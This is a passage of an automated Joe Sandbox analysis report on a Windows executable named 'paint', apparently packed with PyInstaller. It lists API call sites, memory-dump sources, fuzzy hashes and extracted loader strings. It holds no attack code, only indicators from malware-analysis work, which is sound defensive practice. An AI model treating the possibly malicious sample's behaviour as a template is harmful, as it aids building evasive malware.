                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84BD
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84CB
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84DC
                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84E5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                                • Instruction ID: 9a8a52e998d158609c3b3ae7c450f573cf65c3b4f330eb4458d2075b307f4148
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC41C225A0E943A0EB209B60E4545B9A365FF96B55FC00232D56FC37C4FF3EE5068B00
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                                                • API String ID: 0-2031831958
                                                                                                                                                                                                                                                                • Opcode ID: aafa9c7c8745f6f681145794801f24959e5452036c02e7fc8f328c3f6a8f3bcc
                                                                                                                                                                                                                                                                • Instruction ID: 6803ad33953f182e4d6431a67d93952a1262b9240ab031a5c0b0e912d273c627
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aafa9c7c8745f6f681145794801f24959e5452036c02e7fc8f328c3f6a8f3bcc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D14622B1E6938ADB248B14D076F797BA6FB56784F454035DE6E037E9DE2CD400E700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                • Instruction ID: de53b9290878e02cf0887852d066492c2e9152245b0fbf26231cc6f60dc635df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B317E76609B81D6EB608FA0E8807EE7365FB85705F84403ADA5E87B94EF3DC648C710
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                • Instruction ID: 10fd3377e37dac6840fb044f10ffcec09820b9b6a7ea783e8badb70e996898b2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4319136608B8196DB20CF64E8406AE77A8FB89754F940135EAAE83B95EF3DD545CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                                                • Instruction ID: 567ee392d49fde37cac01364b964fff3282d152b8466d7495051d4ecaa150321
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54B1D52AB1868291EB61DBA1D4101B96398EB46BE5FC45931EE6F87BC5FF3DE441C300
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                                                                • API String ID: 0-3175670447
                                                                                                                                                                                                                                                                • Opcode ID: 6c7431fa180725cc36759ec206d1da95856d3c8f4b63d4515f8f124b14de0cae
                                                                                                                                                                                                                                                                • Instruction ID: 7ea52fb3fc1ca53ecab53994157858e4b46630ca3c152d0f1bd4987a3f777b7e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7431fa180725cc36759ec206d1da95856d3c8f4b63d4515f8f124b14de0cae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F1C036B0978286E7609F25E050B6EB7A0F785B88F204035DE6D87BE8DF38D844DB40
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: fd9289cba8bfa2c1e04b0f14acf51c89b125ee162225301f3ae995f4e4b14918
                                                                                                                                                                                                                                                                • Instruction ID: e078a8d4c24fb004a41411f7e8ca2a7b565cf4dfdb54653bf675078c03ad829f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd9289cba8bfa2c1e04b0f14acf51c89b125ee162225301f3ae995f4e4b14918
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8B0923F20D24884C301ABF14681A0C2E20E380E10F040051C3D102260E3AE441B8311
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5830
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5842
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5879
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD588B
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58A4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58B6
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58CF
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58E1
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58FD
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD590F
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD592B
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD593D
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5959
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD596B
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5987
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5999
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD59B5
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD59C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                                • Instruction ID: d27a3dc65abff6921c8fa578cb9386e4c3360e7c04281b7a001f2128a5e72cb7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3422652890EB07F1FB559BA5B91897562A9AF06756FC45035C83F833E0FF7EB5889200
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                • Instruction ID: 4fd2aeea368b7a09fe89871dc722961a3d320f6b18d8b93d5c687a3f982faa66
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C02B728A4EB07F0EB149BA5A8149B5636AAF06756FC44035D83FC33E0FF3EB5499250
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439
                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6F0BD88A7,?,?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD821C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2810: MessageBoxW.USER32 ref: 00007FF6F0BD28EA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                • Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                                                • Instruction ID: 2122c61fddc9ac755c32be2b55d3e5714d38cb3082ddcf2f8103a818439cdb96
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4351D821A1E683B1FB509B60E8516BAA366EF96781FC44031E92FC37D5FE3EE5058740
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                • Opcode ID: f04c79676af06d65577a15ebcc6baf409848a7d07ebbe59f051d325da0faf50a
                                                                                                                                                                                                                                                                • Instruction ID: b509cb3fbae2eb6ed8520ac792fd666c2ea22f8505926139e2675406166c16cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f04c79676af06d65577a15ebcc6baf409848a7d07ebbe59f051d325da0faf50a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E51C165F0A643B2EB10AB6194005B9A366BF82B94FC44531EE2E877D6FF3EE5458340
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
